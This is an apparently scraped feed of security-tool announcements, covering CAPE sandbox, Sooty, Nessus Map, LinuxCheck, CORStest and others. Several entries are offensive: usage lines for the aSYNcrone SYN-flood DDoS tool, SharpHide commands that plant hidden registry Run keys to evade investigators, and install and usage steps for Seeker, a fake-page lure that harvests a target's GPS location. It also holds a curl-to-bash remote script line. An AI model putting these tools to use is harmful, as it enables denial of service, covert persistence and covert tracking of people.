Configuration data may be output from either family packages, or in payloads resulting from behavioural packages. Configuration parsing may then be performed on this by virtue of Yara-based detection, and config parsing based on either of CAPE's config parsing frameworks, the RATDecoders framework from malwareconfig.com and DC3-MWCP (Defense Cyber Crime Center - Malware Configuration Parser). The many parsers/decoders from malwareconfig.com are also included, comprising among many others: Sakula, DarkComet, PredatorPain and PoisonIvy. Thanks to Kevin Breen/TechAnarchy for this framework and parsers (https://github.com/kevthehermit/RATDecoders), and to DC3 for their framework (https://gi thub.com/Defense-Cyber-Crime-Center/DC3-MWCP). Special thanks to Jason Reaves (@sysopfb) for the TrickBot parser and Fabien Perigaud for the PlugX parser.
Utility packages are also included: 'DumpOnAPI' allows a module to be dumped when it calls a specific API function which can be specified in the web interface. 'DumpConfigRegion' allows the memory region containing C2 information or other config data to be dumped for commonly used API calls. These packages can be useful for quickly unpacking/dumping novel samples or configs. The 'Trace' package allows quick access to the debugger by accepting four breakpoints (RVA values) to set on instructions, whereupon a short instruction trace will be output. An optional 'base-on-api' parameter allows the image base to be set by API call.
The CAPE debugger allows breakpoints to be set on read, write or execute of a memory address or region, as well as single-step mode. This allows fine control over malware execution until it is possible to dump the memory regions of interest, containing code or configuration data. Breakpoints can be set dynamically by package code, API hooks or Yara signatures. Thanks to the embedded distorm library the debugger can output the disassembly of instructions during single-step mode or when breakpoints are hit, resulting in instruction traces.
Processes, modules and memory regions can variously be dumped by CAPE through use of a simple API. These dumps can then be scanned and parsed for configuration information. Executable modules are fixed on being dumped, and may also have their imports automatically reconstructed (based on Scylla: https://github.com/NtQuery/Scylla). Packages can be written based on API hooks, the CAPE debugger, or a combination of both. There are a number of other behavioural and malware family packages and parsers currently in the works, so watch this space.
The repository containing the code for the monitor DLLs which form the basis of these packages is a distinct one: https://github.com/ctxis/capemon. This repository is organised in branches for the various packages.
CAPE is derived from spender-sandbox (https://github.com/spender-sandbox), which is derived from Cuckoo Sandbox (https://github.com/cuckoosandbox), so thanks to Brad Spengler, Claudio Guarnieri, Jurriaan Bremer and the countless other Cuckoo contributors without whom this work would not be possible. It also depends on Yara (https://github.com/VirusTotal/yara) from VirusTotal. Thanks to Decalage (@decalage2) for oletools, Didier Stevens and peepdf (@peepdf) for the PDF tools, MalwareCantFly for Vba2Graph and Matt Holl ey (@mrmolley) for binGraph. A big thanks also to doomedraven (@D00m3dR4v3n), Sandor Nemes (@sandornemes), Kevin Ross and Enzo (@enzok) for their support and contributions.
Please contribute to this project by helping create new packages for further malware families, packers, techniques or configuration parsers. Alternatively contact @CapeSandbox or Kevin O'Reilly for further details of CAPE development.

Installation recommendations and scripts for optimal performance
  1. For best compability we strongly suggest installing on Ubuntu 18.04 LTS
  2. KVM is recommended as hypervisor
  • sudo ./kvm-qemu.sh all <username>
  1. To install CAPE itself, cuckoo.sh with all optimizations
  • sudo ./cuckoo.sh all cape
  1. Reboot and enjoy
* All scripts contain help-h, but please check the scripts to understand what they are doing.


Sooty - The SOC Analysts All-In-One CLI Tool To Automate And Speed Up Workflow

December 3, 2019, 3:30 am
$
0
0

Sooty is a tool developed with the task of aiding SOC analysts with automating part of their workflow. One of the goals of Sooty is to perform as much of the routines checks as possible, allowing the analyst more time to spend on deeper analysis within the same time-frame.
Sooty is now proudly supported by Tines.io! The SOAR Platform for Enterprise Security Teams.


Sooty can Currently:
  • Sanitise URL's to be safe to send in emails
  • Perform reverse DNS and DNS lookups
  • Perform reputation checks from:
  • Check if an IP address is a TOR exit node
  • Decode Proofpoint URL's, UTF-8 encoded URLS, Office SafeLink URL's and Base64 Strings
  • Get file hashes and compare them against VirusTotal (see requirements)
  • Perform WhoIs Lookups
  • Check Usernames and Emails against HaveIBeenPwned to see if a breach has occurred. (see requirements)
  • Simple analysis of emails to retrieve URL's, emails and header information.
  • Extract IP addresses from emails.
  • Unshorten URL's that have been shortened by external services. (Limited to 10 requests per hour)
  • Query URLScan.io for reputation reports.
  • Analyze email addresses for known malicious activity and report on domain reputation utilising EmailRep.io
  • Create dynamic email templates that can be used as a base for phishing triage response.(.msg only, .eml coming in future update)

Requirements
  • Python 3.x
  • Install all dependencies from the requirements.txt file. pip install -r requirements.txt
  • To use the Hash comparison with VirusTotal requires an API key, replace the key VT_API_KEY in the code with your own key. The tool will still function without this key, however this feature will not work.
  • To use the Reputation Checker with AbuseIPDB requires an API Key, replace the key AB_API_KEY in the code with your own key. The tool will still function without this key, however this feature will not work.
  • To use the URLScan.io checker function with URLScan requires an API Key, replace the key URLSCAN_IO_KEY in the code with your own key. The tool will still function without this key, however this feature will not work.
  • Use of the HaveIBeenPwned functionality requires an API Key, replace the key HIBP_API_KEY in the code with your own key. The tool will still function without this key, however this feature will not work.

Development
Want to contribute? Great!

Code Contributions
  • New features / requests should start by opening an issue. This helps track new features and prevent crossover.
  • If you wish to work on a feature, leave a comment on the issue page and I will assign you to it.
  • All code modifications, enhancements or additions must be done through a pull request.
  • Once reviewed and merged, contibutors will be added to the ReadMe
Found a Bug? Show Me!

Bugs and Issues
  • If an issue / bug is found please open a ticket in the issue tracker. State the issue first, and how to recreate it if necessary.
  • I will assign myself / another commenter to that case and work on fixing it asap.

Changelog

Version 1.3 - The Templating Update
  • Added first iteration of dynamic email templates that generate based on Sooty's analysis, example below:

Version 1.2 - The Phishing Update
  • Added first iteration of the Phishing tool.
  • Able to analyze an email (outlook / .msg only tested at the moment) and retrieve emails, urls (Proofpoint decode if necessary) and extract info from headers.
  • Extract IP's from body of email.
  • Reputation check on sender of email, and provide enriched information.

Version 1.1 - The Reputation Update
  • Improved Rep Checker
  • Added HaveIBeenPwned Functionality
  • Added DNS Tools and WhoIs Functionality
  • Added Hash and VirusTotal Checkers
  • Added Abuse IPDB, Tor Exit Node, BadIP's to Reputation Checker

Version 1.0
  • Initial Release
  • URL and ProofPoint Decoder
  • Initial implementation of Reputation Checker
  • Sanitize links to be safe for email

RoadMap
This is an outline of what features will be coming in future versions.

Version 1.2 - The Phishing Update
  • Scan email attachments for malicious content, macros, files, scan hashes, etc.

Version 1.3 - The Templating Update
  • Add dynamic email templates that generate based on Sooty's analysis. Edit: Added

Version 1.4 - The PCAP Analysis Update
  • Add ability to analze .pcap files and provide concise, enriched information.

Version 1.x - The Case Update
  • Add a 'New Case' Feature, allowing output of the tool to be output to a txt file.

Contributors:
  • Aaron J Copley for his modified version of ProofPoint's code to decode ProofPoint URL's
  • James Duarte for adding a hash and auto-check option to the hashing function
  • mrpnkt for adding the missing whois requirement to requirements.txt
  • Gurulhu for adding the Base64 Decoder to the Decoders menu.
  • AndThenEnteredAlex for adding the URLScan Function from URLScan.io
  • Eric Kelson for fixing pywin32 requirement not necessary on Linux systems in requirements.txt.



Nessus Map - Parse .Nessus File(S) And Shows Output In Interactive UI

December 3, 2019, 3:30 am
$
0
0

Nessus XML Praser

Requirements
  • Python3
  • Django

Tested on
  • Ubuntu 18.04

What it does
  • Vulnerability based parsing
  • Service based parsing
  • Host bases parsing
  • Unsupported OS parsing
  • Generate Executive Summary of scan
  • Export parsed .nessus(s) to JSON file(s)
  • Import JSON file in Nessus_Map

How it works
Create XML directory in Nessus_Map home directory and place all .nessus files under XML directory and start server.

How to Setup
  • Clone this repo git clone https://github.com/d3vilbug/Nessus_Map.git
  • Change directory cd Nessus_Map
  • Copy all .nessus files in XML directory
  • Start server with python3 manage.py runserver

Vulnerability Parsing


Host Parsing


Services Parsing


Executive Reoprt



Export parsed .nessus(s) to JSON file(s)


Import JSON file in Nessus_Map



Burp Suite Secret Finder - Burp Suite Extension To Discover Apikeys/Tokens From HTTP Response

December 3, 2019, 12:30 pm
$
0
0

Burp Suite extension to discover a apikey/tokens from HTTP response.

Install
  • download SecretFinder
wget https://raw.githubusercontent.com/m4ll0k/BurpSuite-Secret_Finder/master/SecretFinder.py
or
git clone https://github.com/m4ll0k/BurpSuite-Secret_Finder.git
  • now open Burp > Extender > Extensions > Add > set python and select file (SecretFinder.py)

Requirements
  • jython
  • burpsuite


aSYNcrone - A SYN Flood DDoS Tool

December 3, 2019, 1:00 pm
$
0
0

aSYNcrone is a SYN Flood DDoS Attack Tool!

Usage:
git clone https://github.com/fatih4842/aSYNcrone.git

cd aSYNcrone

gcc aSYNcrone.c -o aSYNcrone

./aSYNcrone <source IP> <source port> <destination IP> <destination port>


Search

LinuxCheck - Linux Information Collection Script

December 4, 2019, 3:39 am
$
0
0

A small linux information collection script is mainly used for emergency response. It can be used under Debian or Centos.

Features
  • CPU TOP10, memory TOP10
  • CPU usage
  • boot time
  • Hard disk space information
  • User information, passwd information
  • Environmental variable detection
  • Service list
  • System program changes (debsums -e and rpm -va)
  • Network traffic statistics
  • Network connection, listening port
  • Open port
  • Routing table information
  • Route forwarding
  • ARP
  • DNS Server
  • SSH login information
  • SSH login IP
  • iptables information
  • SSH key detection
  • SSH burst IP
  • Crontab detection
  • Crontab backdoor detection
  • Find common configuration files
  • Find common software
  • Audit history files
  • Querying HOSTS files
  • lsmod exception kernel module
  • Anomaly file detection (nc, tunnel, proxy common hacker tools)
  • Large file detection (some large files packaged)
  • Free space, hard disk mount
  • Open port
  • LD_PRELOAD detection
  • LD_LIBRARY_PATH
  • ld.so.preload
  • NIC promiscuous mode
  • Most used software
  • Change the file mtime in the last 7 days
  • Change the file ctime in the last 7 days
  • View SUID file
  • Find: hidden files
  • Find sensitive files (nc, nmap, tunnel)
  • alias
  • LSOF -L1
  • SSHD
  • Find bash bounce shell
  • php webshell scan
  • jsp webshell scan
  • asp / aspx webshell scan
  • Detection of mining process
  • rkhunter scan

Usage
Networking status:
  • apt-get install silversearcher-ag
  • yum -y install the_silver_searcher
Offline status:
  • Debian:dpkg -i silversearcher-ag_2.2.0-1+b1_amd64.deb
  • Centos:rpm -ivh the_silver_searcher-2.1.0-1.el7.x86_64.rpm
git clone https://github.com/al0ne/LinuxCheck.git
chmod u+x LinuxCheck.sh
./LinuxCheck.sh
If you have installed ag and rkhunter, you can directly use the following command:
bash -c "$(curl -sSL https://raw.githubusercontent.com/al0ne/LinuxCheck/master/LinuxCheck.sh)"
The file will be saved in the format ipaddr_hostname_username_timestamp.log

References
Linenum
https://github.com/lis912/Evaluation_tools
https://ixyzero.com/blog/archives/4.html
https://github.com/T0xst/linux
https://github.com/grayddq/GScan


Codecat - Tool To Help In Manual Analysis In Codereview

December 4, 2019, 12:30 pm
$
0
0

CodeCat is a open source tool to help you in codereview, to find/track sinks and this points follow regex rules...

How too install, step by step:

Go to CodeCat directory, install backend and frontend libs:
$ cd Front
$ sudo python3 -m pip install -r requirements.txt
$ cd ..
$ cd Backend
$ sudo python3 -m pip install -r requirements.txt
Run backend and frontend...
$ cd Codecat
$ cd Frontend; python3 wsgi.py &
$ cd ..
$ cd Backend; python3 wsgi.py &
Next step you need save your user to login:
$ curl -i -X POST -H "Content-Type: application/json" -d '{"email":"admin2@test.com","username":"admin","password":"rubrik123"}' https://127.0.0.1:5001/api/users -k
This end point /api/users, run only one time in first deploy, if you try to send request again to insert user, the endpoint return 404... is for security.
Go to this following "https://127.0.0.1:9093/front/auth/". Now you can enter in this system auth, use login "admin", pass "rubrik123".
Note About TLS: You can configure and load your TLS cert in "wsgi.py".

How you can use it ?
Please study the doc. https://github.com/CoolerVoid/codecat/blob/master/doc/raptor.pdf

Developed by:
github.com/CoolerVoid Antonio Costa - coolerlair@gmail.com


SharpHide - Tool To Create Hidden Registry Keys

December 5, 2019, 3:51 am
$
0
0

Just a nice persistence trick to confuse DFIR investigation. Uses NtSetValueKey native API to create a hidden (null terminated) registry key. This works by adding a null byte in front of the UNICODE_STRING key valuename.
More info about this technique can be found in the following whitepaper: https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf
The tool uses the following registry path in which it creates the hidden run key: (HKCU if user, else HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Usage
To Create hidden registry (Run) key:
SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe"
To Create a hidden registry (Run) key with parameters:
SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe" arguments="arg1 arg2"
Delete hidden registry (Run) key:
SharpHide.exe action=delete
This tool also works with Cobalt Strike's execute-assembly.

Credits
Author: Cornelis de Plaa (@Cneelis) / Outflank


CORStest - A Simple CORS Misconfiguration Scanner

December 5, 2019, 12:30 pm
$
0
0

A simple CORS misconfiguration scanner
Based on the research of James Kettle
CORStest is a quick & dirty Python 2 tool to find Cross-Origin Resource Sharing (CORS) misconfigurations. It takes a text file as input which may contain a list of domain names or URLs. Currently, the following potential vulnerabilities are detected by sending a certain Origin request header and checking for the Access-Control-Allow-Origin response header:
  • Developer backdoor: Insecure dev origins like JSFiddle or CodePen are allowed to access this resource
  • Origin reflection: The origin is simply echoed in ACAO header, any site is allowed to access this resource
  • Null misconfiguration: Any site is allowed to access by forcing the null origin via a sandboxed iframe
  • Pre-domain wildcard:notdomain.com is allowed access, which can simply be registered by an attacker
  • Post-domain wildcard: domain.com.evil.com is allowed access, which can be registered by an attacker
  • Subdomains allowed:sub.domain.com allowed access, exploitable if attacker finds XSS in any subdomain
  • Non-ssl sites allowed: A http origin is allowed access to a https resource, allows MitM to break encryption
  • Invalid CORS header: Wrong use of wildcard or multiple origins, not a security problem but should be fixed
Note that these vulnerabilities/misconfigurations are dependend on the context. In most scenarios, they can only be exploited by an attacker if the Access-Control-Allow-Credentials header is present (see -q flag).

Usage
usage: corstest.py [arguments] infile

positional arguments:
  infile         File with domain or URL list

optional arguments:
  -h, --help     show this help message and exit
  -c name=value  Send cookie with all requests
  -p processes   multiprocessing (default: 32)
  -s             always force ssl/tls requests
  -q             quiet, allow-credentials only
  -v             produce a more verbose output

Example
Use of CORStest to detect misconfigurations for the Alexa top 750 sites (with Access-Control-Allow-Credentials):


Evaluation
Running this CORStest on the Alexa top 1 million sites reveals the following results:


Note that the absolute numbers are quite low, because only 3% of the 1,000,000 tested websites had CORS enabled on their main page and could be analyzed for misconfigurations. This test took about 14 hours on a decent line (DSL). If you have a fast Internet connection, try to increase the number of parallel processes to -p50 or more.

Background
Read more on the technical backgorund of CORS misconfigurations in this fine blogpost or check out this talk. A large scale evaluation of CORS misconfigurations using CORStest is documented here.


Seeker v1.2.1 - Accurately Locate Smartphones Using Social Engineering

December 6, 2019, 3:00 am
$
0
0

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites. Read more on thewhiteh4t's Blog .Seeker Hosts a fake website on In Built PHP Server and uses Serveo to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get :
  • Longitude
  • Latitude
  • Accuracy
  • Altitude - Not always available
  • Direction - Only available if user is moving
  • Speed - Only available if user is moving
Along with Location Information we also get Device Information without any permissions :
  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM - Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address
  • IP Address Reconnaissance
This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc.

How is this Different from IP GeoLocation
  • Other tools and services offer IP Geolocation which is NOT accurate at all and does not give location of the target instead it is the approximate location of the ISP.
  • Seeker uses HTML API and gets Location Permission and then grabs Longitude and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones, if the GPS Hardware is not present, such as on a Laptop, Seeker fallbacks to IP Geolocation or it will look for Cached Coordinates.
  • Generally if a user accepts location permsission, Accuracy of the information recieved is accurate to approximately 30 meters, Accuracy Depends on the Device.
Note : On iPhone due to some reason location accuracy is approximately 65 meters.

Templates
You can choose a template which will be used by seeker from these :
  • NearYou
  • Google Drive (Suggested by @Akaal_no_one)

Tested On :
  • Kali Linux 2019.2
  • BlackArch Linux
  • Ubuntu 19.04
  • Kali Nethunter
  • Termux
  • Parrot OS

Installation

Kali Linux / Ubuntu / Parrot OS
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

BlackArch Linux
pacman -S seeker

Docker
docker pull thewhiteh4t/seeker

Termux
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

Usage
python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
  -h, --help                              show this help message and exit
  -s SUBDOMAIN, --subdomain Subdomain    Provide Subdomain for Serveo URL ( Optional )
  -k KML, --kml KML                       Provide KML Filename ( Optional )
  -t TUNNEL, --tunnel TUNNEL              Specify Tunnel Mode [manual]

# Example

# SERVEO 
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
########### 
python3 seeker.py --subdomain google
python3 seeker.py --   tunnel manual --subdomain zomato

#-----------------------------------#

# Docker Usage
##############

# SERVEO
########
docker run -t --rm thewhiteh4t/seeker

# NGROK
#######

# Step 1
docker network create ngroknet

# Step 2
docker run --rm -t --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual

# Step 3
docker run --rm -t --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080

Known Problems
  • Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL, if not then first READ CLOSED ISSUES, if your problem is not listed, create a new issue.

Demo



Viewing all 5854 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>